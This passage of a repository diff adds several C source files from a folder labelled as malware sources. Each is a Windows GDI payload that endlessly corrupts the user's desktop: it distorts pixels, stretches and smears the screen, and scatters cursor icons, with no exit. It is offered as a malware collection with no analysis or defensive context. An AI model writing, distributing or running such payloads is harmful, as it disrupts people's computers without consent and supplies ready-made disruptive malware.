+ SelectObject(hdcdc, hbm);
15
+ BitBlt(hdcdc, 0, 0, w, h, desk, 0, 0, 0x330008);
16
+ GetBitmapBits(hbm, w * h * 4, data);
17
+ int v = 0;
18
+ BYTE byte = 0;
19
+ if ((GetTickCount() - time) > 60000)
20
+ byte = randy()%0xff;
21
+ for (int i = 0; w * h > i; i++) {
22
+ if (i % h == 0 && randy() % 100 == 0)
23
+ v = randy() % 50;
24
+ ((BYTE*)(data + i))[v % 3] += ((BYTE*)(data + i + v))[v] ^ byte;
25
+ }
26
+ SetBitmapBits(hbm, w * h * 4, data);
27
+ BitBlt(desk, randy() % 3 - 1, randy() % 3 - 1, w, h, hdcdc, 0, 0, 0xCC0020);
28
+ DeleteObject(hbm);
29
+ DeleteObject(hdcdc);
30
+ DeleteObject(desk);
31
+ }
32
+ return 0;
33
+ }
34
+
35
+ int main() {
36
+ CreateThread(0, 0, color, 0, 0, 0);
37
+ Sleep(-1);
38
+ }
src/Sources-by-Nazar17P3426-Malwares/comet.txt ADDED
@@ -0,0 +1,16 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+
3
+ int main() {
4
+ HWND upWnd = GetForegroundWindow();
5
+ HDC upHdc = GetDC(upWnd);
6
+ HDC desktop = GetDC(NULL);
7
+ int xs = GetSystemMetrics(SM_CXSCREEN);
8
+ int ys = GetSystemMetrics(SM_CYSCREEN);
9
+ while(1){
10
+ upWnd = GetForegroundWindow();
11
+ upHdc = GetDC(upWnd);
12
+ desktop = GetDC(NULL);
13
+ for(int i = 0; i < 1900; i ++)
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+ BitBlt(desktop, i, i, i, i, desktop, 100, 100, NOTSRCERASE);
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+ }
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+ }
src/Sources-by-Nazar17P3426-Malwares/cubes.txt ADDED
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+ #include <windows.h>
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+
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+ int main(){
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+ while(1){
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+ HDC hdc = GetDC(0);
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+ int x = GetSystemMetrics(0);
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+ int y = GetSystemMetrics(1);
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+ StretchBlt(hdc, -10, -10, x + 20, y + 20, hdc, 0, 0, x, y, SRCCOPY);
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+ StretchBlt(hdc, 10, 10, x - 20, y - 20, hdc, 0, 0, x, y, SRCCOPY);
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+ ReleaseDC(0, hdc);
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+ }
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+ }
src/Sources-by-Nazar17P3426-Malwares/cursor.txt ADDED
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+ #include <windows.h>
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+
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+ int main() {
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+ while (1) {
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+ HDC hdc = GetDC(0);
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+ int x = GetSystemMetrics(SM_CXSCREEN);
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+ int y = GetSystemMetrics(SM_CYSCREEN);
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+ DrawIcon(hdc, rand() % x, rand() % y, LoadCursor(0, IDC_ARROW));
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+ Sleep(10);
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+ ReleaseDC(0, hdc);
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+ }
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+ }